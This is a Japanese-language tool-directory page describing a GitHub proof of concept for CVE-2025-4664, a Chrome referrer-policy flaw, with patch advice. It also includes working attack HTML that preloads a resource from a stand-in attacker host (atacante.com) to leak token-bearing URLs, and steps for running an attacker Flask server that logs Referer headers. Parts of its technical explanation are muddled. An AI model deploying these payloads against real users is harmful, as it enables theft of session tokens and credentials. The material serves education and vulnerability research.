Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-4664 | Kitploit
ツール/GitHubGitHub/speinador/cve-2025-4664
脆弱性分析エクスプロイト情報収集フィッシングウェブセキュリティ学習と教育
GitHubspeinador/cve-2025-4664

CVE-2025-4664

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔒 CVE-2025-4664 の脆弱性

CVE-2025-4664 の脆弱性は、Google Chrome の Loader コンポーネントにおいて、バージョン 136.0.7103.113 より前で確認された重大度の高いセキュリティ上の欠陥です。この問題により、リモートの攻撃者は特別に細工された HTML ページを介してクロスオリジンのデータを漏えいさせることができ、セッショントークンや認証資格情報などの機密情報が侵害される可能性があります。


❓ この脆弱性とは何か?

この欠陥は、Chrome の Loader コンポーネントにおけるセキュリティポリシーの実装不備に起因します。具体的には、Chrome は、他のブラウザでは解釈されない、サブリソース(画像やスクリプトなど)のリクエストにおける HTTP Link ヘッダー内の referrer-policy ディレクティブを解釈します。攻撃者はこれを利用して、unsafe-url のような制限の緩いポリシーを設定することで、Chrome に URL 全体(機密性の高いパラメータを含む)を攻撃者が管理するドメインへ漏えいさせることができます。


⚠️ 影響と活発な悪用

この脆弱性は実際の環境で活発に悪用されており、米国サイバーセキュリティ・インフラストラクチャセキュリティ庁(CISA)が、既知の悪用された脆弱性カタログ(KEV)に追加しました。CISA は、連邦政府機関が対応する修正を適用する期限として 2025 年 6 月 5 日を設定しています。


🛡️ 緩和策と推奨事項

Google は、以下のバージョンでこの脆弱性を修正するアップデートをリリースしています:

  • 🖥️ Windows および Mac: 136.0.7103.113/.114
  • 🐧 Linux: 136.0.7103.113

すべてのユーザーは、Chrome ブラウザを利用可能な最新バージョンに更新することを強く推奨します。更新を確認して適用するには:

  1. 🔍 Chrome を開き、右上隅の3つのドットのメニューをクリックします。
  2. ⚙️ 「ヘルプ」を選択し、次に「Google Chrome について」を選択します。
  3. ⬇️ Chrome が自動的にアップデートを確認し、利用可能な場合はインストールします。
  4. 🔄 更新後、ブラウザを再起動して変更を適用します。

さらに、Microsoft Edge、Brave、Opera、Vivaldi などの Chromium ベースのブラウザユーザーは、この脆弱性の影響を受ける可能性があるため、対応するアップデートに注意する必要があります。

ブラウザを最新の状態に保つことは、進行中のセキュリティ脅威から身を守り、個人情報を保護するために不可欠です。


🕵️‍♂️ どのように悪用されるのか?

CVE-2025-4664 の脆弱性は、Google Chrome が HTML リンクからサブリソース(画像、スクリプトなど)を読み込む際に、リファラポリシー(referrer-policy)を処理する方法を操作することで悪用されます。


⚙️ 技術的な悪用方法:

  1. 🌐 悪意のあるサイトの作成:
    攻撃者は、HTTP ヘッダーに次のような HTML リンクを含む Web サイトを作成します:

    root@kitploit:~
    <link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
    
  2. 🔧 referrer-policy の操作: ほとんどのブラウザでは、 タグ内のこの referrerpolicy は読み込まれるリソースには適用されません。しかし、Chrome では適用されるため、これが問題の核心です。

  3. 📤 Referer の漏えい: 被害者のブラウザ(Chrome)が victima.com からリソースを読み込むとき、送信元サイトの URL 全体を Referer ヘッダーとして送信します。これには以下の情報が含まれる可能性があります:

  • セッショントークン (?token=ABC123)
  • 機密性の高いパラメータ (?user=admin&password=1234)
  • プライベートな URL
  1. 🎯 攻撃者のサーバーでの受信: 攻撃者は、リソースの送信先として自身が管理する URL を設定できます。例:
root@kitploit:~
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">

被害者がこのリソースにアクセスすると、Chrome はその URL 全体を Referer として攻撃者のサーバーに送信します。

  1. 🕵️ 情報の窃取: 攻撃者のサーバーは HTTP ヘッダーを記録し、被害者の URL の完全な内容を取得します。これには、機密データ、アクセストークン、さらには内部 API の URL が含まれる可能性があります。

✔️ 悪用が成立するための必要条件:

  • 👤 被害者がパッチ未適用の Google Chrome を使用している。
  • 🔑 被害者のサイトの URL に機密情報(認証トークンなど)が含まれている。
  • 🎣 攻撃者が被害者のブラウザに自身のドメインからリソースを読み込ませる(例: フィッシング、悪意のある広告、リダイレクトによる)。

🧪 攻撃の実践例(簡略版):

1- 攻撃者は被害者に以下のリンクを送信します:

root@kitploit:~
https://atacante.com/pagina-maliciosa.html
  1. そのページでは次のようなものが読み込まれます:
root@kitploit:~
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
  1. Chrome ブラウザは以下を送信します:
root@kitploit:~
Referer: https://victima.com/perfil?token=ABC123

攻撃者のドメインへ送信され、トークンが露出します。

プロフィール写真

プロジェクトファイル

🖥️ index.html — 被害者ファイル

このファイルは攻撃の被害者をシミュレートするもので、悪意のある タグを使用して CVE-2025-4664 の脆弱性をどのように悪用できるかを示す簡略化された HTML デモです:

  • 脆弱なインターフェースを表します。
  • 管理された環境で脆弱性がどのように機能するかを実証するために使用されます。
  • CVE-2025-4664 に基づいて攻撃者が悪用できる要素が含まれています。
root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Este recurso apunta a un sitio de la víctima con información sensible en la URL -->
  <link rel="preload" as="image"
        href="https://victima.com/perfil?token=ABC123"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
  <p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>

このコードの動作:

  • タグは、URL にトークンを含む victima.com からの画像をプリロードするように設定されています。
  • referrerpolicy="unsafe-url" により、Chrome は現在のページの URL 全体を Referer として被害者のドメインに送信します。
  • 画像が攻撃者自身のサーバーを指している場合、攻撃者はその完全な URL をログに記録できます。

🐍 servidor_atacante.py — 攻撃者ファイル

このスクリプトを使用すると、Python の小さなサーバーを使用して Referer をキャプチャする攻撃を自動化できます。以下は、データを受信する攻撃者のサーバーをシミュレートする Flask を使用した例です:

  • index.html で表される被害者に対する攻撃をシミュレートします。
  • 脆弱性で説明されている手法を実装します。
  • 実装された緩和策をテストおよび検証するために使用されます。

使用方法:

  1. そのコードを servidor_atacante.py として保存します。
  2. Flask をまだインストールしていない場合はインストールします:
root@kitploit:~
pip install flask
  1. サーバーを実行します:
root@kitploit:~
python servidor_atacante.py
  1. 次に、HTML デモを次のように変更します:
root@kitploit:~
<link rel="preload" as="image"
      href="http://<tu_IP>:8080/captura.jpg"
      referrerpolicy="unsafe-url">

<tu_IP> を、スクリプトを実行しているサーバーのパブリック IP またはローカル IP に置き換えます。


💪 プロジェクトの使い方

🛠️ 1. Flask サーバーを実行する

  1. ターミナル(PowerShell または CMD)を開きます。

  2. ファイルのあるフォルダーに移動します:

root@kitploit:~
cd "C:\Users\Sebas\Desktop\servidor_atacante"
  1. Flask を実行します:
root@kitploit:~
python servidor_atacante.py
  1. 次のような表示が確認できます:
root@kitploit:~
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080

🌐 2. index.html を作成して開く(被害者のシミュレーション)

同じフォルダー(C:\Users\Sebas\Desktop\servidor_atacante)に、次の内容で index.html というファイルを作成します:

root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Simula el ataque -->
  <link rel="preload" as="image"
        href="http://192.168.1.35:8080/captura.jpg"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Simulación CVE-2025-4664</h1>
  <p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>

✅ 重要: IP アドレス(192.168.1.35)が、Flask がローカル IP として表示するものと一致していることを確認してください。異なる場合は、HTML 内で変更してください。

🚀 3. 機密性の高いパラメータを指定して index.html を開く

  1. Chrome を開きます。

  2. アドレスバーに次のように入力します:

root@kitploit:~
file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
  1. Enter キーを押します。

  2. 📥 サーバーで結果を確認する Flask のコンソールに次のような表示が確認できます:

root@kitploit:~
[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123

[Carpeta destino]: ファイルを保存した場所に応じてこのパラメータを変更してください。

🎯 つまり、ブラウザが完全な Referer を攻撃者に送信したということです!


🧑‍🏫 著者

この解説は、Sebastian Peinador が、攻撃的サイバーセキュリティの教育および研究目的で作成しました。


📄 ライセンス

この資料は MIT ライセンスの下で配布されています。


役に立った場合は、リポジトリに ⭐ を付けたり共有したりするのを忘れないでください!

ツールをダウンロード